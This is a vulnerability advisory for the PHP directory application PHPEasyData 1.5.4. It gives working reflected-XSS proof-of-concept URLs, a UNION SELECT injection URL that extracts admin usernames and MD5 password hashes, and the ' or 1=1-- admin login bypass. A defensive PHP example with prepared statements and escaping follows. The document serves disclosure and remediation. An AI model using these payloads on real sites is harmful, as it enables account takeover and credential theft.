PHPEasyData 1.5.4 Multiple Vulnerabilities

2008.07.05
Risk: High
Local: No
Remote: Yes
CWE: CWE-79, CWE-89

------------- *PHPEasyData* -------------

Information:
************
Language : PHP
Version : 1.5.4
Website : http://www.phpeasydata.com/
Problems : Multiple vulnerabilities

Description:
************
PHPEasyData is a PHP application which allows you to manage and display your dynamic data and directories on the web.

Details:
********

---------
** XSS **
---------
There are multiple XSS vulnerabilities. Demonstration exploit URLs:

- last_records.php:
http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E

- annuaire.php:
http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E

-------------------
** SQL Injection **
-------------------
- annuaire.php
http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users
With this URL we can obtain, for example, the admin password (hashed with MD5).

- admin/login.php
Due to a lack of sanitization of the user input in admin/login.php, we can easily gain access to the admin control panel with the login: ' or 1=1--

Credits:
********
Author : Sylvain THUAL
E-mail : contact (at) click-internet (dot) fr
Website : http://www.click-internet.fr
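As an added, defender-side example that is not part of the advisory or of PHPEasyData's own code, the following PHP shows hardened forms of the two patterns described above: a prepared statement for the admin login, integer validation for the annuaire id, and output escaping for the reflected parameters. The table and column names (an_users, user_login, user_pass, user_access) come from the advisory's injection URL; the request field names, the PDO connection and the MD5 storage format are assumptions.

```php
<?php
// Added example, not PHPEasyData code. Table/column names come from the
// advisory's UNION SELECT URL; everything else here is assumed.

// CWE-89, admin/login.php. Vulnerable shape (for contrast only): building
// the query with string concatenation lets a login value such as
//   ' or 1=1--
// turn the WHERE clause into one that is always true:
//   "SELECT * FROM an_users WHERE user_login='$login' AND user_pass='$h'"
function find_admin(PDO $db, string $login, string $password): ?array
{
    // Prepared statement: $login is bound as data, so quotes and comment
    // sequences inside it can never alter the query structure.
    $stmt = $db->prepare(
        'SELECT user_login, user_pass, user_access FROM an_users WHERE user_login = :login'
    );
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Advisory: stored passwords are unsalted MD5 (assumed to be what login.php
    // compares against). A real fix migrates to password_hash()/password_verify();
    // hash_equals() at least keeps the comparison constant-time.
    if ($row === false || !hash_equals($row['user_pass'], md5($password))) {
        return null;
    }
    return $row;
}

// CWE-89, annuaire.php. The "29 union select ..." payload only works because
// the directory id reaches SQL as free text; accept nothing but a positive int.
function directory_id(array $query): ?int
{
    $id = filter_var($query['annuaire'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// CWE-79, last_records.php / annuaire.php. Every request value echoed back into
// the page is escaped; ENT_QUOTES makes it safe inside attribute values too.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage sketch (connection details assumed):
// $db = new PDO('mysql:host=localhost;dbname=phpeasydata', 'user', 'secret',
//               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// if (($id = directory_id($_GET)) === null) { http_response_code(400); exit; }
// $sort = h($_GET['sort_field'] ?? '');
// echo "<a href=\"annuaire.php?annuaire=$id&amp;sort_field=$sort\">sort</a>";
```

Binding the id as an integer parameter in the prepared statement is also an option, but rejecting non-integers up front gives a clean 400 instead of a database error.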

References:

http://xforce.iss.net/xforce/xfdb/42997
http://www.securityfocus.com/bid/29659
http://www.securityfocus.com/archive/1/archive/1/493273/100/0/threaded


Copyright 2020, cxsecurity.com